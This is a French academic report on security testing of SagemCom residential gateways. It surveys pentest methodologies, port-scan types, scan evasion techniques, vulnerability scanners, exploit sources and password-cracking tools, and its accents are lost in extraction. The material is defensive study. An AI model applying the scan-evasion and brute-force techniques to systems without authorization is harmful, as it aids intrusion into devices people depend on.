La mthodologie Open Source Security Testing Methodology Manual (OSSTMM), dveloppe par OpSec , dcrit les dmarches suivre afin de raliser un audit de scurit complet dun systme. [7] L'OSSTMM est constitue de 5 sections distinctes: l'information et le contrle de donnes, la sensibilisation du personnel la scurit, le contrle de fraudes et de l'ingnierie sociale, les rseaux d'ordinateurs et les rseaux de tlcommunications. L'OSSTMM se focalise sur le choix des composantes tester, sur les actions effectuer avant, pendant et aprs un test de scurit et sur la manire de mesurer les rsultats. De nouveaux tests

Page 15

Chapitre 2

Concepts de base

relatifs aux meilleures pratiques internationales, aux lois et la rgularisation sont rgulirement ajouts et actualiss. LOSSTMM fournit une classification des primtres tudier comme suit Classe Scurit physique (PHYSSEC) sous classe Humain Physique Description Des tests qui couvrent l'aspect humain de point de vue physique et psychologique. Des tests qui ncessitent un effort physique et un contact direct avec la cible (accs la salle des serveurs par exemple). Des tests lis l'aspect sans fil du systme qui couvrent aussi les communications lectroniques (ELSEC), signaux (SIGSEC) et les communications non cbls (EMSEC). Des tests qui couvrent les aspects lis toute communication cble. Des tests qui couvrent les communications tablies intra-systme via le rseau cbl.

Scurit du spectre (SPECSEC) Scurit de la communication (COMSEC)

Sans fil

Tlcommunication Rseaux

Tableau 2 Classification OSSTMM

2.3.2. OWASP
La mthodologie Open Web Application Security Project (OWASP) est une dmarche suivre ainsi quun ensemble de tests et de recommandations pour analyser la scurit des applications web. Les tests dOWASP sont catgoriss comme suit : [8] Collecter les informations : Phase de collecte dinformations sur lapplication tester. Tester les gestionnaires de configurations : cette phase couvre les gestionnaires de configurations des bases de donnes, du site web, laccs distance (Telnet, SSH, etc) Tester les modules dauthentification: tester lauthentification et la vrification didentit lors de laccs lapplication web. Tester les gestionnaires des sessions: tests sur les variables des sessions et cookies. Tester les autorisations : Ces tests couvrent les droits daccs sur les donnes pour les diffrents acteurs de lapplication. Tester le logique mtier: tester la dmarche suivre afin deffectuer une tche bien prcise. Tester la validation des donnes reues: ces tests couvrent le contrle sur les donnes reues de la part des clients avant de les utiliser. Tester les attaques de type dni de service (DoS): tester la robustesse de lapplication face des attaques de type DoS. Tester les web services: tester les web services utiliss par lapplication afin dtudier les risques possibles partir deux. Tester ajax: tester les fonctionnalits dAJAX et les attaques qui peuvent les menacer.

Page 16

Chapitre 2

Concepts de base

2.3.3. Autres standards et mthodologies:


Penetration Testing Execution Standard (PTES) fournit un ensemble de rgles et de recommandations afin dtablir des tests de pntrations fiables et efficaces. PTES est structure en sept sections principales [9]: Pr-engagement : Cette phase prsente principalement les discussions entre le testeur et le client afin dclaircir les buts des tests effectuer et de lui donner une ide sur les grandes lignes des tests de pntrations. Collecte dinformation : Cette phase consiste collecter les informations sur le systme. Ces informations incluent le comportement de systme, les services, lemplacement des machines, le systme de scurit, etc. Modlisation des menaces : Dans cette tape on utilise les informations collectes afin de dterminer les risques et les vulnrabilits qui menacent le systme. On dtermine aussi les mthodes dattaque les plus efficaces et les informations quon peut les rcuprer suite ces attaques. Il faut toujours dterminer des mthodes plus rcentes et les failles zero day2 . Pour rcapituler, il faut penser comme un hacker. Analyse des Vulnrabilits : Il faut dterminer la faon avec laquelle on peut accder la cible. Afin de mieux remplir cette tche, il faut combiner les informations acquises et les attaques possibles. Exploitation : Cest la phase la plus critique car il sagit de lexploitation des failles et les vulnrabilits du systme. Tous dabord, il fait que le contrat sign entre le pentester et lentreprise gre les cas o un ou plusieurs tests provoque la mise hors service le systme, total ou partielle, pour viter tous risque de poursuite judiciaire. Aussi, le pentester doit viter les exploits qui provoquent larrt total ou quasi-total du systme. Post Exploitation : Cette tape consiste revrifier les systmes des communications avec dautres systmes ou infrastructures. Rapports : Le rapport des tests comporte : o o o Quest ce quon a fait dans les tests. Comment on a fait ces tests. Comment on peut corriger les erreurs.

Conclusion
Au cours de ce chapitre, nous avons abord les deux grands axes mdiateurs de notre projet: les terminaux rsidentiels et les tests de pntrations. Ainsi nous avons commenc par la prsentation

Faille Zero Day :cest une faille non reconnus des applications ou des services sur un systme bien dfini.

Page 17

Chapitre 2

Concepts de base

des TRs, en particulier les TRs SagemCom, leurs fonctionnalits et les services quils offrent. Ensuite nous avons introduit le Pentesting et son importance dans le monde des TR. Le troisime chapitre va joindre les deux axes et essayer de rpondre la question qui consiste mettre en uvre le pentesting dans le cas dune passerelle rsidentielle. Ainsi nous allons dtailler chaque module offert par la passerelle : son fonctionnement et les diffrentes failles, vulnrabilits et attaques possibles.

Page 18

Chapitre 3

Etude de vulnrabilits des Terminaux Rsidentiels

Les TRs SagemCom offrent plusieurs services et fonctionnalits qui peuvent tre classifis en modules que nous allons aborder dans ce chapitre, en mettant laccent sur les vulnrabilits, les failles et les attaques possibles ainsi que les outils ncessaires pour le droulement dun plan de test de scurit. Nous pouvons dores et dj classifier ces services ou modules comme suit : Module rseau : cette section couvrira les risques lis aux services rseaux offerts par les TRs, notamment dus au : o o o Scan de ports, services et dtections des OS. Scan des vulnrabilits rseaux et GUI. Attaques possibles sur les interfaces dadministration distance et exploitation.

Module WIFI : dans cette section nous dgageons les diffrentes attaques et failles lies la connectivit sans fils et qui prsentent un risque potentiel pour les TRs. Module UPnP : dans cette section, nous introduisons le fonctionnement et limplmentation de lUPnP dans les TRs SagemCom et les risques que prsente cette technologie.

Page 19

Chapitre 3

Etude de vulnrabilits des Terminaux Rsidentiels

Module VoIP : cette section sera consacre aux risques et aux vulnrabilits lies limplmentation de la tlphonie sur IP.

Tous les modules dcrits ci-dessus seront accompagns par une tude sur les diffrents outils ncessaires pour tester leur scurit. Ce chapitre sera finalement conclu par une tude comparative des outils tests.

1. Module rseau
Cette partie va prendre la plus grande part de notre tude car elle comporte plusieurs axes traiter et elle reprsente le point dentre pour les autres modules. Dabord, nous abordons la phase de collecte dinformation, en mettant laccent sur la partie du scan des ports, dtections des services tournant sur le TR ainsi que son OS. En second lieu, nous entamons le scan des vulnrabilits. Cette partie va tre devise en deux sous parties : une consacre aux scans automatiques des failles et des vulnrabilits et lautre consacre aux scans manuels, soit avec des outils spcifiques ou avec des exploits. Les recherches et les tudes ralises dans cette partie se basent essentiellement sur les rsultats dgags de la premire partie, collecte dinformation. Finalement, nous exposons les diffrentes possibilits dexploitations de ces failles et les outils correspondants.

1.1.

Ports, services et OS

La premire phase aborder dans les tests de pntration est la collecte dinformations. Cette tape est trs large dans le cas standard o les tests dintrusion vont tre appliqus sur un systme informatique complet (une architecture rseau, des serveurs, des routeurs, des commutateurs, des zones DMZ, etc.). La collecte dinformations dans ce cas peut couvrir plusieurs vecteurs, allant de la collecte dinformations publiques sur internet ou par des simples commandes comme whois , passant par le Google hack jusqu' le scan des ports et des services. Dans notre cas les tests de pntration vont tre raliss sur un seul dispositif, le terminal rsidentiel, donc plusieurs tapes et mthodes ne sont pas applicables. Le Google hack et la commande whois ne fournissent aucune information utile puisque le TR est ddi lutilisation domestique. La partie la plus importante est alors le scan des ports et des services. Limportance de cette partie se concrtise dans le fait que les informations rcupres prsentent une base solide quun attaquant peut utiliser pour orienter ces attaques et viter les tests inutiles.

Page 20

Chapitre 3

Etude de vulnrabilits des Terminaux Rsidentiels

1.1.1. Scan des ports


Le scan de port est une tape indispensable dans le pentesting. Son apport se prsente dans le fait quil fournit une description dtaille sur ltat des ports de la machine cible. Ce pseudo-rapport nous donne une ide sur lutilisation du port, affect un service bien dfini ou une configuration personnalise par le systme. Le scan de port est utilis souvent par les pirates informatiques pour tenter de trouver des vulnrabilits et des failles possibles sur la machine en question. On peut le considrer comme tentative dintrusion car il sert souvent prparer des attaques possibles. Ce scan ncessite des privilges levs pour pouvoir manipuler et crer des paquets de tests puisquil y a plusieurs techniques possibles qui requirent des modifications prcises sur les diffrents champs des paquets. 1.1.1.1. Types de scans des ports

Actuellement il existe plusieurs types de scan qui permettent de dcouvrir les ports et services tournant sur ou derrire un quipement connect au rseau internet. Etant donn que, dans la pile TCP/IP, les deux protocoles les plus sollicits sont le TCP et lUDP, nous allons donc nous intresser ces deux familles de scan [10].

UDP Scan
Malgr que la plupart des services utilisent le protocole TCP dans leurs communications, lUDP est utilis par plusieurs services importants comme le DNS, le SNMP ou le DHCP. Ce type de scan consiste envoyer un paquet UDP sans donnes (en-tte seulement) et ltat du port se base sur le type du paquet reu par la cible. Le scan UDP est gnralement plus lent que le scan TCP.

TCP Scan
Connu aussi sous le nom de TCP Connect , ce type est le plus simple des scans, il consiste tablir une connexion avec la cible sur le port en question et la fermer immdiatement. Lavantage de ce type de scan est quil ne ncessite pas de privilges spciaux pour leffectuer et utilise des fonctions systme (connect( ) sous Unix). En contre partie, linconvnient majeur de ce scan qui le rend pratiquement inutilisable au moins depuis quelques annes, cest quil est bruyant et peut facilement tre dtect et ladresse IP de lattaquant va tre logu par les systmes de dtections dintrusion.

Page 21

Chapitre 3

Etude de vulnrabilits des Terminaux Rsidentiels

Figure 6 TCP Scan (sur un port ouvert)

SYN Scan
Ce type de scan est connu aussi sous le nom de half-open scanning car il ntablit jamais une connexion TCP complte. Cest un autre type du TCP Scan o le scanneur de port dans ce cas gnre des paquets IP avec le fanion SYN activ. Si le port cible est ouvert alors il va rpondre par un paquet SYN-ACK et le scanneur son tour envoie un paquet RST pour fermer la connexion avant que le handshake soit achev. Il peut tre excut rapidement et scanner des milliers de ports par seconde sur un rseau rapide et il est relativement discret et furtif.

Figure 7 SYN Scan (sur un port ouvert)

ACK Scan
Le but de ce scan nest pas la dtection de ltat du port (ouvert ou ferm) mais plutt sil est filtr ou pas. Ceci est efficace pour tester lexistence dun firewall ou de rgles de scurit. Le Le but de ce scan nest pas la dtection de ltat du port (ouvert ou ferm) mais plutt sil est filtr ou pas. Ceci est efficace pour tester lexistence dun firewall ou de rgles de scurit. Le scanneur de port dans ce cas envoie des paquets TCP avec le fanion ACK 1.

Autres types de scan


Il y a des types de scan qui peuvent furtivement traverser certains pare-feux ou routeurs (Stateless). La plupart des IDS de nos jours sont configurs pour dtecter ce type de scan. Ci-dessous, on dcrit le Fin Scan, TCP NULL Scan et X-mas Scan.

Page 22

Chapitre 3

Etude de vulnrabilits des Terminaux Rsidentiels

Fin Scan nactive que le drapeau FIN utilis si le scan SYN est dtect par le firewall.

Figure 8 Fin Scan (sur un port ouvert)

X-mas Scan active les trois drapeaux FIN, PSH et URG . La technique X-mas a t nomm en souvenir de lattaque de Kevin Mitnick sur le serveur de Tsutomu Shimomura le jour du nol 1994.3

Figure 9 XMAS Scan (sur un port ouvert)

TCP NULL Scan nactive aucun drapeau de lentte (entte TCP vaut 0).

Figure 10 TCP Null Scan (sur un port ouvert)

1.1.1.2.

Technique dvasion

Les systmes de scurit actuels sont trs sophistiqus et intelligents. Ils peuvent dtecter mme le scan de port car ils le considrent comme attaque [11]. FTP bounce : Cette technique consiste utiliser un serveur FTP pour scanner un hte distant par rebond.
3

Le jour de nol 1994, Mitnick s'attaque un expert en scurit informatique et ancien hacker : le japonais Tsutomu Shimomura.

Page 23

Chapitre 3

Etude de vulnrabilits des Terminaux Rsidentiels

TCP decoy : Cette technique consiste leurrer l'hte scann, en dissimulant le scan parmi des scans fictifs d'htes. Idle scan : Dans l'tablissement standard d'une connexion (SYN SYN/ACK ACK), les paquets transmis sont accompagns d'un numro d'identification appel IPID. Ce dernier est incrment rgulirement sur certains systmes (en particulier Windows). La technique consiste exploiter cette faille afin de dterminer, en fonction de l'incrmentation de l'IPID, l'tat d'un port. La spcificit de cette attaque rside dans le fait que l'attaquant utilise un hte zombie afin de ne pas apparatre dans les fichiers journaux de l'hte scann.

Utilisation de ports source autoriss : afin d'augmenter les chances de lgitimer le trafic gnr par les scans, il est possible de forger les paquets en spcifiant des ports source lgitimes pour le firewall (20/tcp, 21/tcp pour FTP, 80/tcp pour HTTP, etc.). Ainsi, le firewall est susceptible de laisser passer le trafic dans la mesure o il pourra le considrer comme un retour de connexion lgitime. De la mme manire, pour les scans UDP, un trafic en provenance du port 53/udp pourra tre interprt par le firewall comme une rponse DNS.

Figure 11 Utiliser un port source autoris pendant le scan

Frquence d'envoi des paquets : il est possible de rendre un scan plus furtif en espaant l'envoi des paquets destination de la machine scanne. Fragmentation des paquets : Les dtecteurs d'intrusions modernes comme Snort sont capables, par rassemblage des paquets, de dtecter le scan. Il existe par ailleurs des outils spcifiques (tels que FragRouter) permettant de fragmenter tout ce qui sort d'un rseau.

Scan ACK : certains firewalls interdisent les paquets qui n'ont pas le flag ACK actif afin de limiter les tentatives d'intrusion.

Figure 12 Scan ACK

Page 24

Chapitre 3
1.1.1.3. Analyse des rsultats

Etude de vulnrabilits des Terminaux Rsidentiels

Chaque type de scan utilise des types bien spcifiques de paquets et par consquence les rponses diffrent aussi. Le scanneur de ports analyse les rponses et dtermine ltat des ports en fonction des types de paquets reus. Ci-dessous un tableau explicatif qui dcrit chaque rsultat en fonction des paquets envoys. Type de scan Rponse reue paquet SYN/ACK paquet RST ICMP (type3 code 1, 2, 3, 9,10 ou 13) aucune rponse "3 handshake" tabli "3 handshake" non tabli ICMP (type3 code 1, 2, 9,10 ou 13) ICMP (type 3, code 3) Paquet UDP ICMP (type3 code 1, 2, 3, 9,10 ou 13) paquet RST paquet RST ICMP (type3 code 1, 2, 3, 9,10 ou 13) aucune rponse Etat du port ouvert ferm filtr ouvert ferm filtr ferm ouvert filtr non filtr ferm filtr ouvert/filtr

SYN Scan

TCP Scan

UDP Scan

ACK Scan XMAS/FIN/TCP NULL Scan

Tableau 3 Etat du port par type du scan et rponse

Le problme qui se pose maintenant, est que tous les systmes ne respectent pas la RFC 7934 la lettre. Plusieurs systmes renvoient des RST en rponse aux paquets reus et ce quelque soit l'tat du port de destination, qu'il soit ouvert ou pas [12].

1.1.2. Scan des services


Le scan de services suit le scan de port et son importance se prsente dans le fait quil sert dtecter en premier lieu les noms des services tournant sur la machine cible et au-del, il aide dgager beaucoup dinformations comme la version et le nom dapplication (ISC Bind, Appache httpd, Solaris telnetd, OpenRG telnetd, ). Ces informations seront trs utiles pour le pentester, ainsi que le hacker, pour dterminer si le systme test implmente des services vulnrables ou des versions connues par leurs vulnrabilits et failles exploitables [13]. Le scan de services est bas sur le rsultat de scan de port. Selon le numro du port ouvert dtect le scanneur traite et analyse les rsultats. Si le port dtect ouvert est un port standard, comme les ports 25/tcp, 80/tcp et 53/udp, le scanneur naura pas besoin de lancer dautre requte sur le mme port pour dterminer le nom
4

RFC 793 : Spcification du protocole TCP, mise en place par DARP (Defense Advanced Research Projects Agency)

Page 25

Chapitre 3

Etude de vulnrabilits des Terminaux Rsidentiels

des services, il utilise une base de donnes pour faire la correspondance. La plupart des scanneurs ne se limitent pas cette tape mais ils essayent de dterminer le type de service (ex : jboss, tomcat, ). Cela est possibles en analysant les rponses reues (ex : si le port 80 est ouvert donc il sagit dun serveur web (HTTP), ensuite le scanneur envoie une requte GET / pour collecter plus dinformation). Dans lautre cas, o le port nest pas standard (ex : 9003), le scanneur lance une srie de test pour dterminer les types de protocoles utiliss (ex.: ftp, ssh, telnet, http). Une fois le protocole est fix, le scanneur lance dautres requtes afin de connatre le nom de l'application (ex: ISC Bind, Appache httpd, Solaris telnetd), le numro de version, etc.

1.1.3. Dtection dOS


Lutilit de la dtection dOS, ou OS fingerprinting , est assez vidente, car il existe plusieurs failles de scurit qui dpendent principalement du type de lOS et sa version. Chaque faille peut tre exploits diffremment dun OS un autre et gnralement les exploits visent quelques fichiers systme et manipulent des comportements particuliers pour chaque OS. [14] Parmi les techniques connues dans la dtection de lOS, nous citons la technique TCP/IP Fingerprinting . Cette mthode consiste envoyer jusqu' 16 paquets TCP, UDP et ICMP aux ports ouverts de la cible. Chaque paquet est envoy au moins une fois si le port est ferm. Le scanneur manipule tous les champs du paquet et les envoie dans un ordre spcial. Les rsultats reus contiennent plusieurs attributs qui seront soigneusement analyss et traits, et en combinant plusieurs rsultats des diffrents types de paquets, le scanneur gnre le fingerprint de lOS. Il arrive parfois que le scanneur ne parvient pas collecter les informations ncessaires pour dterminer lOS de la cible cause du manque de ports ouverts ou la mauvaise mise en place du standard du protocole RFCs. Dans ce cas, certain scanneur gnrent une liste des OS possibles avec un pourcentage dapproximation.

1.1.4. Outils de scan des ports


Il existe plusieurs outils de scan sur le march. Il existe le libre, le gratuit, le payant, etc. Chacun deux a ces propres spcifications et fonctionnalits. Dans notre cas, qui est un peu spcial, les scans seront effectus sur un TR qui va surement provoquer des erreurs et des faux positifs pendant le scan.

Critre de choix
Dans notre tude de comparaison entre les diffrentes solutions de scan, nous jouons sur les critres de choix suivants:

Page 26

Chapitre 3

Etude de vulnrabilits des Terminaux Rsidentiels

Ralisation des tous les types des scans lists ci-dessus. Ralisation des scans de services. Ralisation de la dtection de lOS. License Utilisations

Outils proposs
Nmap : Cest loutil le plus connu comme scanneur de ports muni dune base de donnes norme contenant plus que de 2700 signature dOS et 7300 versions de services. Il prsente un outil trs efficace pour le scan des ports. Il offre la possibilit dutiliser et de crer des scripts personnaliss. Unicornscan : Cest un scanneur de port connu. Iil assure aussi le scan des services mais il se limite au nom du protocole sans donner des informations supplmentaires sur les services dtects. Scanrand : Cest un scanneur du port simple sans dtection dOS ou des services. Hping3 : Cest un forgeur de paquet conu principalement pour les tests de scurit des firewalls et des systmes. Il peut tre utilis comme un scanneur de port car il offre la possibilit de manipuler les champs dun paquet envoyer (TCP/UDP/IP/ICMP). Son utilisation est ddie pour les utilisateurs avancs. Type des scans SYN TCP UDP ACK Scan Scan Scan Scan NMAP Unicornscan Scanrand hping3 X X X X X X X X X X X X X X X X XMAS/FIN / TCP NULL Scan X X X X Scan des services X X Dtectio n de l'OS X type de License gratuit gratuit gratuit gratuit

utilisation

plateforme

Simple Simple Moyen Difficile

Linux/Windows Linux Linux Linux/Windows

Tableau 4 Tableau comparatif des outils de scan

1.2.

Scan des vulnrabilits

Le scan de vulnrabilit est une tape indispensable dans les tests de pntration. En se basant sur les rsultats des scans raliss dans ltape prcdente, ports ouverts, nom du service, version, type de lOS et sa version, etc, le pentester doit dgager les risques et les failles qui peuvent prsenter un danger pour le systme test. Des bases de donnes normes des vulnrabilits sont mises disposition des testeurs o chaque faille est dcrite en dtail avec la date de publication, la description dtaill, la plateforme utilise, la solution envisageable, lexploit sil existe et les rfrences de la faille sur les autres sites de vulnrabilits. Parmi ces sites nous trouvons :

Page 27

Chapitre 3

Etude de vulnrabilits des Terminaux Rsidentiels

OSVDB : Open Source Vulnerability Data Base est une base de donnes de vulnrabilits developpe et mise en place par et pour la communit. Son but est la mise en place dune plateforme solide, riche en information et extensible pour toute information lie la scurit informatique (vulnrabilit et faille).

NVD de NIST : National Vulnerability Database, elle est mise en place et maintenue par la National Institue of Standards and Technology. CVE : Common Vulnerability and Exposures, elle est mise en place et maintenue par MITRE organisation sans but lucratif qui sintresse au intrt publique. US-CERT Vulnerability Notes Database : cest une base de donnes dinformations lies aux vulnrabilits cr par le US-CERT (United State - Community Emergency Response Teams)

1.2.1. Types de scan des vulnrabilits


Si le testeur ne veut pas utiliser les sites cits auparavant ou il narrive pas trouver des vulnrabilits connues sur le systme test comme pour notre cas terminal rsidentiel avec un systme bien spcifique alors il existe plusieurs autres techniques et mthodes utiliser quon peut classifier sous deux procdures gnriques: Evaluation manuelle des vulnrabilits : Dans ce cas le pentester a recourt dvelopper ses propres cas de test et exploitations. Le cas le plus courant est celui des applications web car chaque application web est personnalise selon les besoins des utilisateurs et la technologie utilise. Evaluation automatique des vulnrabilits : Dans ce cas le pentester utilise des scanneurs de vulnrabilits automatiques. Cette mthode est trs avantageuse par rapport la premire mthode notamment car elle nous fait gagner normment de temps. Les scanneurs automatiques de vulnrabilits couvrent toutes les failles connues (selon la version de scanneur, la mise jour, etc.).

Dans notre cas, les technologies utilises dans la conception et la mise en place des services et des applications implmentes dans le TR sont, plus ou moins, spcifiques aux besoins des TRs SagemCom. Il est clair que nous allons rencontrer certains problmes avec les scanneurs des vulnrabilits car ils sont principalement ddis pour des systmes qui utilisent des technologies largement utiliss et dploys. Les scans manuels sont donc une tape ne pas ngliger, comme il est indique ci-dessus les outils de scan peuvent gnrer des faux positifs ou carrment ne pas trouver de failles, et ceci car le systme test est un peu particulier ou utilise des technologies non connues, voir propritaires.

Page 28

Chapitre 3

Etude de vulnrabilits des Terminaux Rsidentiels

1.2.2. Outils de scan des vulnrabilits


Dans cette section, on va prsenter les diffrents types des scanneurs de vulnrabilits ainsi que leur fonctionnement. Gnralement ces outils peuvent tre classs sous deux catgories. Scanneur de vulnrabilits gnrales qui couvre plusieurs axes : vulnrabilit rseaux, vulnrabilit lis au systme dexploitation, vulnrabilit lis aux services, etc. Scanneurs de vulnrabilit pour un type bien spcifique de services ou dapplications. Sous cette catgorie on trouve principalement les scanneurs des vulnrabilits des applications WEB et en second lieu ceux des bases de donnes. Dans le cas des TRs SagemCom, on a besoins que des scanneurs de vulnrabilits gnrales et ceux des applications WEB. 1.2.2.1. Scanneur de vulnrabilits automatique

Il existe plusieurs solutions systme sous cette catgorie, on va sintresser Nessus, Nexpose, OpenVAS, GFI Lan GUARD et QualysGuard : Nessus : Scanneur de vulnrabilits propos par Teenable , conu pour tre utilis sur plusieurs plateforme, il peut tre install sur un serveur part et y accder partir de nimporte quelle machine sur le rseau. Il existe deux versions version payante et communautaire, la diffrence se concrtise dans les fonctionnalits et les services du support technique. Il se base sur les Policies . Ces derniers se composent de plusieurs options de configurations relatives au type de scan raliser tel que le type de scan de ports, les plugins utiliser, les paramtres dauthentification pour les bases de donnes, site web, etc. Par dfaut, Nessus offre quatre Policies : o o o o External Network Scan : Scan sur des machines lextrieur du LAN qui prsentent gnralement moins de services pour les rseaux. Internal Network Scan : Scan sur des machines du LAN, ce scan est plus large que le premier car il couvre plus de services. Web App Tests : Scan sur les failles et vulnrabilits Web. Prepare for DCI PSS audits : aide se prparer pour un audit PCI DSS.5

Nexpose : outil propos par Rapid7 , qui, comme Nessus , offre deux versions, payantes et communautaire, cette dernire est trs limite de point de vue fonctionnalits. Nexpose ncessite un PC performant avec une configuration minimale prsentant les caractristiques suivantes : o 2 GHz processeur.

The Payment Card Industry Data Security Standard (PCI DSS) est une norme de protection des donnes pour les organismes qui traitent la scurit des informations de titulaire de carte pour le dbit, le crdit, pay d'avance, l'e-bourse, etc [33].

Page 29

Chapitre 3
o o o

Etude de vulnrabilits des Terminaux Rsidentiels 2 GB (32 bits), 4 GB RAM (64 bits). 10 GB + despace vide sur le disque. 100 Mbps pour la carte rseau. reprsente un systme

OpenVas : OpenVAS Open Vulnerability Assesement System

d'valuation de vulnrabilit open source et rassemble une gamme doutils complte pour scanner la scurit du rseau. Le noyau OpenVAS est un composant de serveur qui assure un ensemble de vulnrabilits Network Vulnerability Tests (NVTs) pour dtecter les problmes de scurit dans les systmes distants et les applications. GFI Lan GUARD : outil payant de GFI , pour les systmes Windows, il est connu pour sa simplicit dutilisation. Qualys Guard: solution payante de Qualys , sa particularit est quelle offre ses services scan via le Cloud Computing 6 sous forme de SaaS 7. Lavantage majeur de cette solution est quelle ne ncessite aucune installation et par consquence ladministrateur ou le responsable de la scurit se concentre seulement sur les tests des pntrations sans prendre en compte la configuration et la mise en place dans le rseau local. Tous les traitements se font chez les serveurs du fournisseur de services. Ci dessous un tableau comparatif entre les outils dcrits auparavant, en se basant sur les critres de choix suivants: Temps dexcution. License. Plateforme. Extensibilit. Utilisation.

Cloud Computing : un concept qui consiste dporter sur des serveurs distants des traitements informatiques traditionnellement localiss sur des serveurs locaux ou sur le poste client de l'utilisateur. 7 SaaS : Software as a Service, le client utilise des applications offertes par le fournisseur du systme Cloud, certaine application peuvent tre personnalise par le client, on trouve par exemple Gmail, Google Documents, Google Maps

Page 30

Chapitre 3

Etude de vulnrabilits des Terminaux Rsidentiels

Temps d'excution Nessus Nexpose OpenVas GFI LanGUARD QualysGuard


* **

type de License payant/communit payant/communit gratuit payant payant

plateforme Windows/linux Windows/linux linux Windows tous (SaaS)

Extensibilit* Oui Non Oui Non Non

Utilisation** difficile moyen difficile facile difficile

proportionnellement *** aux tests 5 minutes


****

proportionnellement *** aux tests proportionnellement aux tests *** plus ou moins long (scan distance)

: quelques outils lists peuvent tre extensibles par lintgration dautre outils ou lutilisation de plugins. : lutilisation est juge de point de vue configuration et mise en place. *** : les temps de scan peuvent varier de quelques minutes jusqu quelque heures selon la configuration utilise. **** : les scans proposs par la version communautaire du Nexpose ne dpassent pas les 5 minutes, ceci est d la limitation des fonctionnalits et des types de tests.
Tableau 5 Tableau comparatif des scanneurs des vulnrabilits automatiques

1.2.2.2.

Scanneur de vulnrabilits WEB

Vu que la plupart des services et applications convergent vers la technologie web, pour les avantages quelle offre en termes de cout et de performance. Cette migration, malgr ses avantages, portes aussi des inconvnients qui ont fait que le nombre de failles et de vulnrabilits fortement augment. Pour y remdier et du moins les dtecter, il existe une gamme doutils spcialiss dans les scans des vulnrabilits web. Dans le cas des TRs SagemCom, les utilisateurs peuvent ladministrer travers son interface web (ou GUI). Les TRs vu leurs limitations de point vu ressources (RAM, CPU, espace,) ne peuvent pas implmenter des technologies web connue pour les grands serveurs, ou la limite les utiliser dans quelques fonctionnalits. La plus part des outils disponibles sur le march, sont ddis pour des applications web utilisant des technologies connue (PHP, ASP, JSP,) ou des CMS (JOOMLA, DRUPAL, WordPress,), ceci est explicable car ils sont souvent utiliss. [15] Les critres de choix dun scanneur de vulnrabilits sont nombreux, une tude comparatif t effectu par luniversit de Californie sur des diffrents scanneurs afin de dgager les meilleurs.

Tableau 6 Liste des outils et leur type de licence

Page 31

Chapitre 3

Etude de vulnrabilits des Terminaux Rsidentiels

Ci-dessous un graphe qui prsente le pourcentage des faux ngatifs par rapport au rsultat corrects selon le type de configuration; certains outils sont paramtrables et dautre non.

Figure 13 Evaluation des resultats

Le temps dexcution de scan est un critre trs important de comparaison. Certains outils contiennent beaucoup plus que des fonctionnalits et des tests qui vont influencer par suite la dure dexcutions.

Figure 14 Temps d'excutions du scan

Les tests raliss sur les TRs SagemCom, pour le scan des vulnrabilits web, ont prouv que pour un systme bien particulier, comme dans notre cas, on ne peut pas se limiter lutilisation dun seul outil car chacun deux peut dgager des informations utiles que les autres ne trouvent forcment pas. Une autre remarque est que quelques outils classs parmi les meilleurs narrivent mme pas gnrer des rsultats logiques et raisonnables sans parler de liens inexistant. Ces trois outils sont les plus appropris pour notre cas, Nikto, SkipFish et un proxy web (ZAP de OWASP). ZAP est un proxy web qui sert intercepter les requtes http et peut faire des modifications sur leurs paramtres. Dans le cas dauthentification dans un site web, il est indispensable dutiliser un proxy pour tester tous le contenu du site.

Page 32

Chapitre 3

Etude de vulnrabilits des Terminaux Rsidentiels

1.3.

Exploits et autres types dattaques

1.3.1. Exploits
Cest la dernire tape de la partie rseaux. Aprs toutes les tapes ralises : scan des ports et services, dtection de lOS et scan des vulnrabilits, il faut bien les mettre en valeur et les utiliser afin de vrifier quils sagissent de vraie failles et dfaillances ou juste des alertes de type faux ngatifs. Il existe plusieurs mthodes possibles pour vrifier ce point et rdiger un rapport solide et complet qui contient une description relle des vulnrabilits. Le testeur dans cette tape a le choix entre utiliser des exploits publics disponibles sur les sites des exploits ou rdiger ces propres exploits ou encore utiliser un outil de pntrations comme le fameux MetaSploit . Les sites des exploits : Security Focus : Chaque vulnrabilit et accompagne par les diffrents exploits possibles. Exploit database : archive des exploits des applications et des systmes. Ces derniers sont classs sous plusieurs catgories. La distribution BackTrack 5 offre un outil de recherche dans la base de donnes dexploits. Un petit script dvelopper permet de faire la mise jour des exploits. (Voir annexe 2) Metasploit tait un projet open-source sur la scurit informatique qui fournit des informations sur des vulnrabilits, aide la pntration de systmes informatiss et au dveloppement de signatures pour les IDS. Le plus connu des sous-projets est le Metasploit Framework, un outil pour le dveloppement et l'excution d'exploits contre une machine distante. Les autres sous-projets importants sont la base de donnes d'Opcode 8, l'archive de shellcode, et la recherche dans la scurit.

1.3.2. Autres types dattaques


Craquage des mots de passe :
Les attaques dont on va parler dans cette section, sont lies aux consoles dadministration distance offert par le TR. Toujours, en se basant sur les rsultats des autres scans on peut dterminer les types de ces consoles (Telnet, SSH). Lattaque la plus connu est lattaque brute force ou attaque par dictionnaire pour tenter plusieurs combinaisons de mots de passe. Plusieurs outils disponibles sont ddies ces types dattaque. Parmi eux, on peut citer les plus connus dans le monde du libre ; Cain & Abel, John the Ripper, Ophcrack et Hydra.

Opcode : numro qui prcde chaque instruction afin de dterminer sa nature. (Ex : pour larchitecture x86, lOpcode 0x6A correspond linstruction PUSH.

Page 33

Chapitre 3 Attaque DDOS:

Etude de vulnrabilits des Terminaux Rsidentiels

Ce sont les attaques qui provoquent larrt total ou partiel dun service ou dun systme pendant un certain temps. Le hacker envoi plusieurs paquets TCP sans prendre en considration les rponses reues du serveur. Ce dernier, pour chaque requte reue, il alloue quelques ressources (Mmoire, Temps processeur, ). Aprs certain temps, le serveur sera hors service due la surcharge des ressources. [35]

2. Module UPnP
2.1. Prsentation

Le terme UPnP (Universal Plug and Play) driv de Plug and Play ou on branche et a marche dsigne une technologie pour attacher dynamiquement les priphriques l'ordinateur. De ce fait, UPnP reprend les concepts de PnP pour les tendre tout le rseau, facilitant la recherche, la dcouverte et la communication entre diffrents quipements connects au rseau local. En effet, cette technologie a t promulgue en 1999 par lUPnP Consortium, dmarr par Microsoft. Le Forum UPnP comporte au mois de dcembre 2009 plus de 894 fournisseurs y compris des leaders de lindustrie spcialiss dans le domaine informatique, rseau, systmes lectroniques, domotique, technologies mobiles, etc. UPnP est un protocole qui vise simplifier le dploiement des diffrents quipements savoir les ordinateurs, les quipements lectroniques et les quipements mobiles sur le rseau domestique et assurer leur interoprabilit. Pour ce faire, UPnP utilise TCP/IP et d'autres protocoles IP afin de grer des lments de proximit et excuter des commandes distance, etc.

Fonctionnement
